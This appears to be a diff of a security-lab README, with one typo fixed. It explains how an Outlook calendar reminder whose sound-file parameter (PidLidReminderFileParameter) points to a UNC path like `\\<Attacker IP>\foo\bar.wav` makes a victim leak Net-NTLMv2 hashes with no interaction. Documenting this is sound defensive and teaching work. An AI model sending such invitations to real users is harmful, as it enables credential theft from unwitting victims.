rasmus-leseberg/security-labs/README.md

 ### Abusing Appointment Alerts via UNC Paths
 In Outlook, it's possible to add reminder notifications when sending calendar invtitations.
 It's possible to specify the audio file played for the notification.
 Manipulating this parameter can enable a threa actor to force Outlook to leak the current password hashes to an attacker with zero interaction required.

-TO do this, an attacker creates a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attackers machine.
+To do this, an attacker creates a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share in the attackers machine.
 Outlook stores the reference to the sound file in an internal parameter called `PidLidReminderFileParameter`.
 To override default configs on the victim machine, `PidLidReminderOverride` needs to be set to true.

 It was possible to specify a `UNC (Universal Naming Convention)` path instead of local one, which includes Network share paths like: `\\<Attacker IP>(@80/443)\foo\bar.wav`.
 When the victim receives the malicious email, the UNC path directs them to the SMB share, causing the system to start an NTLM authentication process against the attackers machine, leaking `Net-NTLMv2` hashes.
 If for some reason the SMB isnt a viable option, non-server versions of Windows will accept UNC paths to port 80 and 443 as well.